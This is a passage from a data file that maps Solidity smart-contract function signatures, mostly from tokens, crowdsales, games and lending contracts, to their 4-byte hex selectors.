"0xf6a47e9a", "VTrust()": "0xf174683a", "GCCERC20(uint256,string,string)": "0xef885772", "ClassicVolkswagen()": "0x275676cf", "payether(address,uint256)": "0xdd8617ca", "doExchange(uint256)": "0xfcb5d44d", "newExchange(address,uint256,address,address,uint256)": "0x966a360c", "addPermission(address,bytes32)": "0x5e1758fa", "TOSPrivateHoldingContract()": "0xe85f3be6", "CASToken()": "0xf0e6c2dc", "TradingLife()": "0xaeac529a", "invalidPayments(address[],uint256[])": "0x806f208a", "MAGExCoin()": "0xcb739476", "WanersiLinkToken(uint256,string,string)": "0x63488772", "_isFuture(uint256)": "0x2c572eb5", "_isPast(uint256)": "0xbba231ce", "_getRoleSignature(address,bytes32,address)": "0xd2577fec", "unassignRole(address,bytes32,address)": "0xb830c538", "unassignOwner(address,address)": "0xf4bd9429", "setPromoMoney(uint256)": "0xeea23d8a", "setPromoGen0(uint256)": "0x14c588de", "transferOwnerMoney(address)": "0xfdaacf1b", "transferOwnershipServer(address)": "0x05caca6c", "CT(uint256,string,string)": "0xa2478c8d", "RewardHoDLers()": "0x2f723c7f", "CBN(address)": "0x80667aa8", "tokenEquivalent(uint256,uint256)": "0x5c390f82", "_exchange(uint256,uint256)": "0xb8c52477", "_pay()": "0x1a3de5c3", "VixcoreToken2(uint256,string,string)": "0x22ce1f8f", "getEventId(address,bytes32)": "0x49ca8cc9", "getBet(address,uint256,uint256)": "0x87734d53", "getWhoBet(address,uint256,uint256)": "0xa7e5cb3e", "getBetsNums(address,uint256)": "0x56da7743", "getBid(address,uint256,uint256)": "0x97f7b4f7", "getBidsNum(address,uint256)": "0x0e5689bc", "findBid(address,uint256,bytes32)": "0x17df9a73", "determineWinner(address,uint256,bytes32)": "0x4a173383", "finishEvent(address,uint256)": "0xeba38402", "makeBet(address,uint256,bytes32)": "0x52fa3712", "createEvent(bytes32,bytes32[],address,uint256,uint256,uint256,uint256)": "0xfb8dd3bb", "setTokenForSale(uint256,uint256,bool)": "0x338e4fd6", "giveToken(address,uint256,bool)": "0x5df70904", "cancelTokenSale(uint256,bool)": "0x088df612", "buyChamp(uint256,address)": "0xdcfa6ac4", "buyItem(uint256,address)": "0x7383d709", "_distributeNewSaleInput(address)": "0x0b12a148", "_addWithdrawal(address,address,uint256)": "0x0fc0e9a8", "setTrusted(address,address,bool)": "0x304cb3d8", "loadController(address,address)": "0x8056696e", "ZClassicGold()": "0x0c58e23c", "ELRUN()": "0x7786b22d", "unfreezeTokens(address)": "0x90862d1b", "freezeTokens(address)": "0x5607f408", "ZZWHToken()": "0xc0cab256", "GoodBoyPoints()": "0x38bde636", "getObjClassExp(uint64)": "0x0f75c82e", "setContract(address,address,address,address,address,address,address)": "0x8a9ba931", "getRandom(address,uint256,uint64)": "0x9b945097", "EtheremonTransform(address,address,address,address,address,address,address)": "0xb54811f1", "getClassTransformInfo(uint32)": "0xa53290ab", "getTransformInfo(uint32)": "0xe8679512", "getLayEggInfo(uint32)": "0xe94b6aef", "getRandomClassId(uint256)": "0x4cd3745d", "burnMonster(uint64)": "0x81b23042", "mintMonster(uint32,address,string)": "0x0963d4b7", "LaboToken()": "0x44e63717", "mintBounty(address,string)": "0x9a04e602", "mintPresell(address,string)": "0x2774d052", "transferAmount(address,uint256,uint256)": "0x55ce15f4", "minionRemove(address)": "0x065de1f6", "minionAdd(address)": "0x04612d20", "updateAndTransferFrom(address,uint256,string,uint256,uint256)": "0xbba90086", "updateAndSafeTransferFrom(address,uint256,string,bytes)": "0xe4d5a558", "updateAndSafeTransferFrom(address,uint256,string)": "0xe629837c", "_removeFrom(address,uint256)": "0xf310348e", "_remove(uint256)": "0x5a140df0", "_setApprovalForAll(address,address,bool)": "0x8c4e3f32", "isOwnerOrApproved(uint256,address)": "0xa0ee153e", "isExisting(uint256)": "0xb92cc8cf", "getParentB(uint256)": "0xfc7c1c80", "getParentA(uint256)": "0xb2444a70", "getParams(uint256)": "0x08a4f072", "getGenome(uint256)": "0x65d6759a", "_addTo(address,uint256)": "0xdaa45281", "isMinion(address)": "0xdfafcf7e", "release(bool)": "0x72a4d94b", "sell_spice_melange(uint256)": "0x8e3dcc60", "create_planet()": "0xc0f7c498", "get_info(uint256)": "0xc6cebebd", "get_planet_info(uint256)": "0xc36c0155", "set_koef(uint256)": "0xf81dee03", "set_master(address)": "0x86795e8d", "get_owner_planets(uint256)": "0xbab92a29", "Filmpass()": "0x24df2d5b", "Monarch()": "0xe2812256", "minePoP(address,uint256,uint256)": "0xb40e76fa", "getAdjustedPotAsFixedPointForGameId(uint256,bool)": "0xe0522012", "getSplitPotAsFixedPointForGameId(uint256,bool)": "0x5db09db5", "getWindowAdjRatioForGameId(uint256,bool)": "0xbd382b45", "updateDeveloperMiningPower(uint256)": "0x7d38a772", "updateAmountToTakeAsRake(uint256)": "0x260bf85a", "amountToSeedNextRound(uint256,uint256)": "0xe53eb53d", "getSeedPercentageForGameId(uint256)": "0x5980e72d", "getDeveloperMiningPowerForGameId(uint256)": "0x5cca3905", "updatePercentToTakeAsSeed(uint256)": "0xd7b33f66", "updateNextGamePotSplit(uint256)": "0xf4c97199", "updateNextWindowAdjustmentRatio(int256,bool)": "0x1299f11e", "updateNextGameInitalMinBetSize(uint256)": "0x235304b2", "getRegularCarSupply(uint256)": "0xdceda27b", "getMidgradeCarSupply(uint256)": "0x3c0dabdb", "getPremiumCarSupply(uint256)": "0x3b58d5d7", "getRegularCarsForVariant(uint256)": "0x7c6aafd1", "getMidgradeCarsForVariant(uint256)": "0x7444b227", "getPremiumCarsForVariant(uint256)": "0x085ff39a", "getTotalSupplyForType(uint256)": "0xc4c68b44", "isRegular(uint256)": "0xb850ae36", "isMidGrade(uint256)": "0x73d28995", "isPremium(uint256)": "0x029bca78", "generateGroups()": "0xdcf73856", "disableUser(address,address)": "0x47274dbe", "getRandomNumber(uint256)": "0xb37217a4", "addUser(address,string,string,uint256)": "0xb3c25835", "scheduleIssuePOIs()": "0x65b1fdf4", "getParticipant(address)": "0x7143059f", "scheduleHangouts()": "0xbd9335c0", "MonedaAlcala(string,string)": "0x48519189", "Alarm()": "0x35ee2783", "scheduleShuffling()": "0xeece1e1f", "escrow(uint256,string,address,uint256)": "0xe68d3ae3", "registration(uint256,uint256,uint256)": "0x9c43d950", "checkAndVerify(bytes)": "0x97297467", "getMinConfirmationsByAddr(address)": "0x6cf761d4", "getOwnersIndex(address)": "0x63052d82", "EthBtcEscrow()": "0x67546967", "getOwners()": "0xa0e67e2b", "howManyOwners()": "0xa05e822a", "update(uint256)": "0x82ab890a", "processProposals()": "0x0965bf7d", "openDoor()": "0xdb0e127a", "DieselPricePeg()": "0x22ebb3ac", "voteOnProposal(uint256,bool,uint256)": "0x3106fea0", "smartDoor(address[])": "0xe2233ada", "NewProposal(uint256)": "0x9a863892", "insert(uint256,uint256)": "0x1d834a1b", "registrationDeposit(address)": "0xf29617da", "depositGovernance(uint256,address)": "0x2facc4e8", "getUnderlyingPrice()": "0x468f02d2", "transfer(string,string,bool)": "0x8a9ffb90", "computeMarginAmount()": "0x60e519c0", "transfer(string,string)": "0x504ac982", "getIsSettled()": "0x883ba26b", "addressToBytes(address,address)": "0xcb2b9031", "getIsAvailable()": "0xf27197ab", "ShapeshiftBot()": "0xb595181f", "available()": "0x48a0d754", "computeSettlementAmount()": "0xd810f298", "buy()": "0xa6f2ae3a", "takeFlight()": "0xe816a515", "offer()": "0xc028df06", "setNewEstimate(int256,int256)": "0x739f888c", "setEstimateCost(uint256,uint256)": "0x418cf199", "setAmount(int32)": "0x677913e9", "homebase(int256,int256)": "0x4a00a522", "CustodialForward()": "0x54ae8492", "initROS()": "0xd44aadf7", "GPSDestination(int256,int256,uint256)": "0x306df22d", "getLatest()": "0xc36af460", "PathCost(uint16,uint32)": "0xafc4a982", "getDocument(uint256)": "0x3f9b250a", "toZ1(uint256[3],uint256)": "0xf6458c6a", "SatPosition(int256,int256)": "0xeccb15bc", "documentExists(bytes)": "0xe4547f98", "expmod(uint256,uint256,uint256)": "0x783ce458", "transferDocument(bytes,address)": "0x2f6ae467", "invmod(uint256,uint256)": "0x0b80f8d3", "createHistory(bytes,address,address)": "0x3448c7d6", "newDocument(bytes)": "0x3f77b560", "Etherdoc()": "0x492b67ea", "getFileListElement(bytes)": "0xe4360fc8", "adminDeleteAccount()": "0x3e450fff", "getFileListSize()": "0x7d60e343", "adminRetrieveDonations(address)": "0x5c3e426c", "getFileListTail()": "0x95671958", "getFileListHead()": "0xdc63a62c", "getNumberOfTweets()": "0xca7dc5b1", "getNextFile(bytes)": "0xca77ab8a", "getOwnerAddress()": "0x0c4f65bd", "getPreviousFile(bytes)": "0xe4c2db06", "getFileAddress(bytes)": "0x3d8e2947", "getLatestTweet()": "0xae978f08", "removeFile(bytes)": "0xc5958bda", "getTweet(uint256)": "0xc3ad5ecb", "createFile(bytes)": "0x5aebfd14", "tweet(string)": "0xfb46d4c5", "FileStore()": "0x4a23dc52", "isAdmin()": "0xb6db75a0", "TweetAccount()": "0x3e0a51b4", "FarmShare()": "0xe7d50e5c", "isValidChannel(uint256)": "0xb7a97a2b", "purchaseProduct(uint256,uint256)": "0xa0440426", "reclaim(uint256)": "0x2dabbeed", "getProductInfo(uint256)": "0x79a85e6c", "newProduct(string,string,uint256,uint256)": "0x3dd7c1b9", "claim(uint256,uint256,uint8,bytes,bytes)": "0x23add736", "getMemberInfo(address)": "0x5f1231ea", "verify(uint256,uint256,uint8,bytes,bytes)": "0xe22b0c46", "newCommunity(address)": "0x65093661", "getHash(uint256,uint256)": "0x1b855044", "newParameters(int256,uint256,uint256,uint256)": "0xd7bc23af", "channelCount()": "0xacf8bf2a", "createChannel(address,uint256)": "0xbb510a77", "payInstallment(uint256)": "0xe2f8a017", "refund(uint256)": "0x278ecde1", "contribute(uint256)": "0xc1cbbca7", "testBitsXorFailIndexOOB()": "0x8e46fbb2", "testBitsXorSuccess()": "0x622e88cb", "newLoan(bytes,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0xe044c2de", "testBitXorFailIndexOOB()": "0xa268b332", "baz(uint32,bool)": "0xcdcd77c0", "issueToken(address,string)": "0x5669c94f", "claimToken(bytes32)": "0xa5bfa9a9", "WebOfTrustToken(address,uint256)": "0xbc08afd9", "__callback(bytes32,string,bytes)": "0x38bbfa50", "__callback(bytes32,string)": "0x27dc297e", "getIdentities(address[])": "0x043bb5e7", "getIdentity(address)": "0x2fea7b81", "getSize(uint256)": "0x023c23db", "ChannelSeries(address)": "0xeb045789", "getSize(address)": "0x504f1671", "AddressSeries(address)": "0x21958a50", "getSize()": "0xde8fa431", "ContentSeries(address)": "0xeb782d8c", "identify(address[])": "0x54ea4000", "identify(address)": "0x4d207d9a", "register(uint256)": "0xf207564e", "Identity()": "0x124eaee6", "getAttributes(uint256)": "0x4378a6e3", "getTimestamp(uint256)": "0xb633620c", "getChannelID(uint256)": "0x110df916", "getPublisher(uint256)": "0x969cb7c3", "toChannelID(string)": "0xee725d44", "toContentID(address,uint256,string,bytes)": "0x76f30ca1", "publish(string,string,bytes,address[])": "0x8570153e", "Content()": "0xa501e88d", "add(uint256)": "0x1003e2d2", "contentExists(uint256)": "0x724121ae", "Devcon2TokenForTesting()": "0x7993e5c2", "Devcon2Token()": "0x899942b8", "END_MINTING()": "0x34b7ac9b", "identityOf(bytes32)": "0x4fc9c91a", "approve(address,bytes32)": "0x5cd2f4d3", "transferFrom(address,address,bytes32)": "0xb3c06f50", "transfer(address,bytes32)": "0x7d32e7bd", "removeMinter(address)": "0x3092afd5", "addMinter(address)": "0x983b2d56", "destroy(bytes32)": "0x6e0bd282", "mint(int256,address,string)": "0x72c3015c", "ecverify(bytes32,bytes,address)": "0x39cdde32", "ecrecovery(bytes32,bytes)": "0x77d32e94", "safer_ecrecover(bytes32,uint8,bytes32,bytes32)": "0xbbba3333", "logTransfer(address,address,bytes32)": "0x85d5c971", "logApproval(address,address,bytes32)": "0xafb95eed", "generateId(string)": "0x19a9c2f1", "isTokenUpgraded(bytes32)": "0x09fc8f6d", "upgradeCount()": "0xc4128b6d", "proxyUpgrade(address,address,bytes)": "0x216ef940", "upgrade()": "0xd55ec697", "tokenId(address)": "0x7ca31724", "ownerOf(bytes32)": "0x7dd56411", "transferFrom(address,address)": "0x103f9251", "transfer(address)": "0x1a695230", "isEligibleForUpgrade(address)": "0xf3d91708", "IndividualityTokenRoot(address)": "0x5fcc2edb", "_Approval(address,address,bytes32)": "0x62c99e84", "_Transfer(address,address,bytes32)": "0x76d66f5d", "MainnetETCSurvey()": "0x58cb7323", "ETCSurvey(address)": "0x6e2edf30", "MainnetSurvey(uint256,string,bytes32[])": "0x71c59097", "Survey(address,uint256,string,bytes32[])": "0xe8580dd4", "ownedToken(address)": "0x69c8b344", "isTokenOwner(address)": "0x96286cc9", "m_dailyLimit()": "0xf1736d86", "hasConfirmed(bytes32,address)": "0xc2cf7326", "revoke(bytes32)": "0xb75c7dc6", "confirm(bytes32)": "0x797af627", "m_required()": "0x746c9171", "m_spentToday()": "0x659010e7", "m_lastDay()": "0x52375093", "m_numOwners()": "0x4123cb6b", "testThrowSetNotTransferableNotOwner()": "0x5e1936d4", "testThrowSetNotRetractableNotOwner()": "0x20130753", "testThrowSetEnforceRevisionsNotOwner()": "0xef41e06f", "testThrowSetNotUpdatableNotOwner()": "0x53caf582", "testThrowDisownNotTransferable()": "0x938ae4cc", "testThrowDisownNotOwner()": "0x7b48ba20", "testThrowTransferDisabled()": "0x837a7ba5", "testThrowTransferNotEnabled()": "0xd9ec0508", "testThrowTransferNotTransferable()": "0x966acb38", "testThrowTransferDisableNotEnabled()": "0xe5c7e509", "testThrowTransferEnableNotTransferable()": "0x78205f67", "testThrowRetractNotRetractable()": "0x75a6a332", "testThrowRetractNotOwner()": "0x23647398", "testThrowRestartEnforceRevisions()": "0xbb6a1427", "testThrowRestartNotUpdatable()": "0x85fe0448", "testThrowRestartNotOwner()": "0xfaf0952b", "testThrowRetractLatestRevisionDoesntHaveAdditionalRevisions()": "0x6edb4cf6", "testThrowRetractLatestRevisionEnforceRevisions()": "0x531d1974", "testThrowRetractLatestRevisionNotUpdatable()": "0x2432eb23", "testThrowRetractLatestRevisionNotOwner()": "0x46c3166f", "testThrowUpdateLatestRevisionEnforceRevisions()": "0x550bcd8d", "testThrowUpdateLatestRevisionNotUpdatable()": "0x835b42fc", "testThrowUpdateLatestRevisionNotOwner()": "0x42ce0f30", "testThrowCreateNewRevisionNotUpdatable()": "0xe3a199d6", "testThrowCreateNewRevisionNotOwner()": "0x15a0df43", "testTransfer()": "0xd591221f", "testThrowsTransferDisabled()": "0xd4b1d19f", "testThrowsTransferNotEnabled()": "0xd3d6a975", "testThrowsTransferNotTransferable()": "0x06459119", "get_player_address(uint256)": "0xf28075af", "player_count()": "0xcf7b8c5f", "get_selected_player()": "0xf95b4309", "get_game_fees()": "0xe21f8e56", "get_game_balance()": "0xf8e29885", "get_end_time()": "0x1536fec6", "get_start_time()": "0xdf29dfc4", "process_game()": "0xed2d4a1b", "RDMGameToken()": "0x05aeb1e1", "BroCoin()": "0xbe988dbc", "WeedToken()": "0x9ae000c6", "TheCoinSale()": "0x5b8be30c", "Bags()": "0x56eb5a79", "HackableToken()": "0x54674ebc", "teamAllocation(address)": "0x2a1ef0ca", "MTF(uint256,uint256)": "0x78be0496", "disableBonus()": "0x4fe61b9e", "enableBonus()": "0x2be90846", "isBonusEnabled()": "0x425adae7", "_preValidateTransaction(address,uint256)": "0xa7e74377", "_checkCap(uint256,uint256)": "0x7e71572b", "enterMainSale()": "0xe6dd672c", "enterPreSale()": "0x52aa2ae9", "whitelistMainSaleAddressMany(address[],bool)": "0xdc2ebcbc", "whitelistMainSaleAddress(address,bool)": "0x923020d9", "whitelistPreSaleAddressMany(address[],bool)": "0xf3ec3f4a", "whitelistPreSaleAddress(address,bool)": "0xd296853a", "setMainSaleParams(uint256,uint256,uint256,uint256)": "0x7dd563c3", "setPreSaleParams(uint256,uint256,uint256,uint256)": "0xec99bfe9", "PTestYankeeCoin(uint256,string,string)": "0xe83b2adf", "getFrontEndTokenSupply(address)": "0x5504f45e", "MyHumanStandardToken(uint256,string,uint8,string)": "0xe6e45ea2", "setvalue(string,string)": "0xb57566d8", "getvalue(string)": "0xd94178c2", "setTransferFeeMax(uint256)": "0xc4a2d664", "setTransferFeeMin(uint256)": "0xb24dced3", "RocketCoins()": "0x12f7fb6f", "HedeCoin()": "0x41dbe546", "PingoToken()": "0x516a6b22", "sellATR(uint256)": "0x645dfad7", "buyATR()": "0x845890c3", "printCoins(uint256)": "0x178b8baf", "setRates(uint256,uint256)": "0xac6af280", "ATRToken()": "0xe9da12ab", "MotherDNAShare()": "0xc8e71424", "getGovtApplication(string,string)": "0xa5c28b1e", "getGovtApplicationByIndex(string,uint256)": "0x9b4c1902", "getGovtApplicationsCount(string)": "0x383cf18f", "getVendorApplicationScoringTrack(string,uint256)": "0xd8b3d69a", "getVendorApplicationScoringTrackCount(string)": "0x4a24f6d9", "getVendorApplicationStatusTrack(string,uint256)": "0x77f9bc13", "getVendorApplicationStatusTrackCount(string)": "0xc041652d", "getVendorApplicationsCount(string)": "0x01429244", "getVendorApplicationStatus(string)": "0xfb50aec5", "getVendorApplication(string)": "0xccf4a941", "createScore(string,string,uint256,uint256,uint256,uint256,string,string,string,string,string)": "0xaa368c19", "updateVendorApplicationStatus(string,string,string,string,string,string)": "0xd52b38cd", "submitApplication(string,string,string,string,string,string,string,string)": "0x91dc077b", "addApplication(string,string,string,string)": "0xc9099385", "isApplicationExits(string,string)": "0x8df0fda1", "BankuNetwork()": "0xfcc2a69b", "setValidTransferAddress(address)": "0xfcf43ce2", "_isValidAddress(address)": "0x00aa25b2", "_isAuthorizedOrOwner(address)": "0x98229465", "addTokenToTotalSupply(uint256)": "0x11ab19f8", "closeFail()": "0x647d02d2", "closeSuccess()": "0x875cb3e5", "canBuy()": "0xff65226c", "tokensLeft()": "0xb31f8f93", "UTCToken()": "0x048259e6", "BHM()": "0xf4915f5f", "KyberNetworkProxy(address)": "0xdeecb187", "MasterNet(uint256,string,string)": "0x33904cb1", "getMatchInfoList03()": "0xfcf23d63", "getMatchInfoList02()": "0xa57f59c0", "getMatchInfoList01()": "0x5b2aa4ae", "getUserAccountInfo()": "0x59167fcc", "XoudCoin()": "0x0ca09e1e", "feesTakenFromPrize(uint256,uint256)": "0x4eb3148e", "noticeWinner(uint8)": "0x7abb03bc", "setOutcome(uint8,uint8)": "0xa9da0fad", "betMatch(uint8,uint8)": "0x29516c41", "withdrawICOEth()": "0xfc2df281", "getMatchIndex(uint8)": "0x849f94bf", "withdrawPreICOEth()": "0xe358b0e1", "updateMatchStartTime(uint8,uint256)": "0x75d04628", "addMultipleTier2Members(address[])": "0xf519618f", "updateMatch(uint8,uint8,uint8)": "0xa6bb1667", "addTier2Member(address)": "0xa99e6465", "getTotalInvest()": "0x5dd68f36", "isInTier2(address)": "0x47683f00", "getClamTax()": "0x5559d8d9", "addMultipleTier1Members(address[])": "0xd153ab40", "setClamTax(uint8)": "0x00e11919", "addTier1Member(address)": "0x2840f290", "initRegistMatch(uint8,uint8,uint8,uint256)": "0xfb7baf70", "isInTier1(address)": "0x53344481", "addMultipleToWhitelist(address[])": "0x8401f8d1", "getCFO()": "0x7b936ac2", "inMainSalePeriod()": "0xe84d2abf", "getPurchaserAddressCount()": "0x1164e11e", "sweep()": "0x35faa416", "purchase(bytes8)": "0xb5f78d11", "setEnforceAddressMatch(bool)": "0x5f5fca9a", "SaleTracker(bool)": "0x6bfd9716", "AuctusTokenVesting(address,uint256,uint256,uint256)": "0x0a59c66e", "AuctusEtherVesting(address,uint256,uint256,uint256)": "0xd7480aa4", "totalControlledBalance()": "0x453b7eab", "getAllowedStepAmount()": "0x773adc70", "AuctusStepVesting(address,uint256,uint256,uint256)": "0x7d2044cc", "_createLock(uint32,address,uint256)": "0xd1e0363d", "calculateInterest(uint32,uint256)": "0x277a6889", "getLocksForAddress(address,uint256)": "0x44fcbd79", "getLocks(uint256)": "0xc6d8f0c4", "getLockCountForAddress(address)": "0x90f549ba", "getLockCount()": "0x94493c43", "getLockProducts(uint256)": "0xe18a9134", "getLockProductCount()": "0x4de16053", "releaseFunds(uint256)": "0x4d68282f", "setLockProductActiveState(uint32,bool)": "0xc3b75b8f", "addLockProduct(uint32,uint32,uint32,bool)": "0xc57c3bbd", "_repayLoan(uint256,uint256)": "0x0370c0d9", "getLoanTuple(uint256)": "0x442d27dc", "getLoansForAddress(address,uint256)": "0x60ad970d", "getLoanCountForAddress(address)": "0x2432282d", "getLoans(uint256)": "0x0aed3ca1", "getLoanCount()": "0x52196812", "getProducts(uint256)": "0xdebad27f", "collect(uint256[])": "0x57f46cbe", "newEthBackedLoan(uint32)": "0xd4849a8b", "setLoanProductActiveState(uint32,bool)": "0x15f647fc", "addLoanProduct(uint32,uint32,uint32,uint256,uint32,bool)": "0xc1c6d4e8", "_placeSellTokenOrder(address,uint32,uint256)": "0x92946284", "_fillOrder(uint64,uint64)": "0x293ee91f", "getActiveSellOrders(uint256)": "0x6e593210", "getActiveBuyOrders(uint256)": "0xc93e8b15", "getActiveOrderCounts()": "0x7e6503bb", "matchMultipleOrders(uint64[],uint64[])": "0xc7e83451", "matchOrders(uint64,uint64)": "0x0c85feea", "cancelSellTokenOrder(uint64)": "0xc3c51aca", "cancelBuyTokenOrder(uint64)": "0x2bd0ce0f", "placeSellTokenOrder(uint32,uint256)": "0x2dc9d3e5", "placeBuyTokenOrder(uint32)": "0xae94ec05", "getMaxLoanAmountAllowedByLtd()": "0x12ef900b", "getMaxLockAmountAllowedByLtd()": "0x1768fd6f", "getMaxLoanAmount(uint256)": "0xe95f2c7d", "getMaxLockAmount(uint256,uint256)": "0x265b5d93", "getLoanToDepositRatio()": "0x73396ff4", "adjustKPIs(uint256,uint256)": "0xf66cce0e", "setLtdParams(uint256,uint256,uint256)": "0xc65ccc07", "setAcceptedLegacyAugmintToken(address,int256,bool)": "0x831bb4f2", "loanCollectionNotification(uint256)": "0x58c31603", "loanRepaymentNotification(uint256)": "0x4cae5f99", "issueLoan(address,uint256)": "0x1895687d", "releaseFundsNotification(uint256)": "0x295777be", "requestInterest(uint256,uint256)": "0x64217bdf", "burnFromReserve(uint256)": "0xd0d968c0", "issueToReserve(uint256)": "0x023f4a66", "convertToWei(bytes32,uint256)": "0x5c481d8b", "convertFromWei(bytes32,uint256)": "0x82f5e31b", "setMultipleRates(bytes32[],uint256[])": "0xdd17eaec", "setRate(bytes32,uint256)": "0x680819eb", "METS6()": "0x57e6a6af", "finishedSale()": "0xa7fdb4f5", "tokensBoughtWithBTC(address,uint256)": "0xa445dc5a", "_depositTokens(address,uint256)": "0x21420a3d", "_investAsBonusProgram(address,uint256)": "0xe9506c73", "_investAsEarlybird(address,uint256)": "0xf364e7f4", "getAmountFida(uint256)": "0x050c8803", "getWhitelistStatus(address,address)": "0xe682e290", "setWhitelistStatus(address,address,bool)": "0x4852a273", "setWhitelistingAddress(address,address)": "0x659e27b0", "setBtcTokenBoughtAddress(address,address)": "0x17274abd", "_changeTokenAddress(address)": "0xe509cac5", "addAmountBoughtAsMember(address,uint256)": "0xc592c3ba", "changeGasLimit(uint256)": "0xbaf539ee", "_updatePrice()": "0xc9eea77c", "giveBounty(uint256,address,address)": "0xb8093100", "setBountyWalletAddress(address)": "0xf268225c", "_calculateBonus(uint256,uint256)": "0xb4f96d60", "_setTokenDescription(address,uint256,string)": "0x822785e4", "_setTokenName(address,uint256,string)": "0xe7519ac0", "_setName(bytes32,string)": "0xc9e20791", "namespaceTaken(bytes32)": "0x787f9710", "getServiceNames(bytes32,address[],address)": "0x1e51a907", "getTokenDescriptions(address,uint256[])": "0x5e3dbedb", "getTokenNames(address,uint256[])": "0x7ed04cf2", "getNames(address[],address)": "0xdc042405", "getServiceName(bytes32)": "0xfb368e8f", "getServiceNameByAddress(bytes32,address,address)": "0x7e241c64", "getNameByAddress(address,address)": "0xabd23d95", "getTokenDescription(address,uint256)": "0xb4819e76", "getTokenName(address,uint256)": "0xd515be39", "setTokenDescription(address,uint256,string)": "0xc94bfdb1", "setTokenName(address,uint256,string)": "0x4290e6b6", "NameProvider(address)": "0xf319a899", "setLiquid(bool)": "0x40f828a2", "initialize(uint256)": "0xfe4b84df", "setDirectDebit(bool)": "0x7bc0e005", "setDelegate(bool)": "0x218e6877", "eraseUnsoldPreSaleTokens()": "0x8a394c4c", "unitsPerEth()": "0xb01f1571", "nextRoundFee()": "0xcdcb8788", "privatesaleFinalized()": "0x62205bd8", "maximumMainSaleRaise()": "0xb7cce253", "allowNorthPoleMinting()": "0xf9ac71bf", "guideInvestmentAttractedShareToPay()": "0xc5ec365f", "revokeAndReclaim()": "0x2c580a35", "saleEtherCap()": "0x1fd4b40c", "baseUrl()": "0x5bcabf04", "tokenRate4()": "0x4c4a9761", "lastAmountSent()": "0xa0e7b4dc", "rNo()": "0xb454c415", "EGGS_TO_HATCH_1SQUIRREL()": "0x6594ea6c", "memo()": "0x58c3b870", "percentToFoundersAfterICO()": "0x99c20c34", "congressMemberThreshold()": "0xcedf222e", "currentPeriodRate()": "0x0142c8de", "SCTokens()": "0xb8a548c5", "capTokens()": "0xa0b70e87", "expirationBlock()": "0x6d417064", "ICOPart()": "0x309d8210", "adminFee()": "0xa0be06f9", "selectWinner50()": "0x49d3060f", "lockedAmount()": "0x6ab28bc8", "maxCardUpgradeLevel()": "0x8fd1b1f2", "crowdsaleTargetBRA()": "0x51252412", "priceForBuyingCostume()": "0x7a6e1384", "RATE_FOR_WEEK3()": "0x2c28aa1b", "round3StartTime()": "0x4bba32fb", "stopGracePeriod()": "0xb536fa63", "TOKEN_DECIMALS()": "0x5b7f415c", "PUBLIC_OFFER_SUPPLY()": "0x176cd40a", "PRESALEPLUSCROWDSALE_EVE()": "0xfe5f1dc4", "IntervalBytecodes()": "0xe7f40d35", "totalInitialAddresses()": "0xde9eade3", "masterAddress()": "0xd365a08e", "storageContract()": "0x11ce0267", "totalSupplyForCrowdsaleAndMint()": "0x4ec2cde6", "RewardPoolAmount()": "0xc5f4b3da", "FOUNDER_STAKE()": "0x3ee90a29", "hardCapTokensAmount()": "0xab9def41", "SECONDS_PER_HOUR()": "0x4df86126", "b2bcToken()": "0x972993e6", "teamLockPeriodInSec()": "0x0c58062b", "donationRate()": "0x0d38ffcd", "account1()": "0xecfd0a56", "reviveFee()": "0x101e359b", "isVestingRevoked()": "0x0cab068c", "dropSupply()": "0x5fdc9e0a", "period2Denominator()": "0xaa52fbd4", "TokenPerETH()": "0x3f52c660", "MIN_BID()": "0xce69cd20", "backendAddress()": "0x0d72d57f", "premiumDomainK()": "0x633ce1d2", "CROWDSALE_ALLOCATION()": "0xfd09d013", "OTHERCRUISER_EXTRACTION_BASE()": "0x95470497", "initialTime()": "0x9ced0e9b", "icnq()": "0x351f98d9", "EXPECTED_START()": "0x71026acc", "deathData_v9()": "0x9f237b43", "tokensForPresale2()": "0x51fb3043", "startIcoDate()": "0xc99d9ef7", "bonus20end()": "0x96817396", "presaleAmountRemaining()": "0x7febd721", "withdrawAndKill()": "0x571a0830", "pregnantEtherDogs()": "0x9665f170", "thirtyPercentWithBonus()": "0x6912c8ba", "lockup_startdate()": "0x2ab7173b", "PHASE2_START_TIME()": "0x36484ea0", "TDESupplyRemaining()": "0x56996f6b", "walletCompanyReserve()": "0xae4538ce", "tokenSupportSoftLimit()": "0xa848e2ec", "tokensDistributedCrowdsale()": "0x9d4b1239", "cost_of_transfers()": "0x19ff7096", "CoinsRemainAfterICO()": "0x956a538a", "allReceivedEth()": "0x73a1e7f5", "isPreSaleFinalised()": "0xb7e2f504", "importerBanker()": "0x35269662", "bonusOff()": "0x8c74c5c0", "utilityAccount()": "0xeb00f20e", "driverCount()": "0xf359d66d", "numBidders()": "0xfb4cd8e2", "numRequesters()": "0x61425d79", "CREATOR_TOKEN()": "0xb9879450", "KNOWLEDGE_TO_GET_1FRANKLIN()": "0x97f990f2", "bonusLOT()": "0x5af3e9d7", "closePreICO()": "0x9abe3906", "TOKEN_HODL_3M()": "0xfbd7d081", "teamLockAddr()": "0xf798abce", "dayLength()": "0xa8d00e73", "cliffDuration()": "0xd85349f7", "tierBudget()": "0xeac037b2", "endThirdWeekICO()": "0x6288020f", "platformWithdrawalRecipient()": "0xa70616de", "disableLockDown()": "0x469450cc", "deadlineOne()": "0xf197bbdd", "ethPriceInCents()": "0x3edfe35e", "ICOcontroller()": "0xe9c9db5c", "forecastingClosed()": "0xc4c5f3de", "getPlayerId(uint256)": "0xf4385912", "getTeamId(uint256)": "0x79428570", "checkIsAttached(uint256)": "0x5265440c", "createSeedCollectible(uint8,uint8,uint256,address,uint256,uint256,uint256)": "0x4f6d04e7", "createPromoCollectible(uint8,uint8,uint256,address,uint256,uint256,uint256)": "0xb7dcf6a9", "getTransfer(bytes32,uint256)": "0x5b1b5d90", "viewRand()": "0x380f3771", "_updateSeed()": "0x27053417", "PowerCoin(uint256,string,string)": "0x56c21897", "UinfoToken()": "0xb2194fd8", "benchTransfer(address[],uint256[])": "0xd39cee11", "longJudge(uint256,address)": "0xe5eee9be", "longRecord(address,uint256)": "0x89f6709c", "setLong(address)": "0x608bd7f4", "setShort(address)": "0xec8909c0", "BlockchainMoneyEngine(uint256,string,string)": "0xda17c21b", "HerdiusToken()": "0x44187d45", "XZBX()": "0xfe5d5868", "DigiBlackCoin()": "0xb744d893", "_addBonus(uint256)": "0x58fb9f36", "isInStage2()": "0x2f379fc8", "isInStage1()": "0x5c80461e", "setExchangeRateETHToUSD(uint256,uint256)": "0xeff7ed65", "Blockcash(string,string,uint256,uint256)": "0xc5d7dd0a", 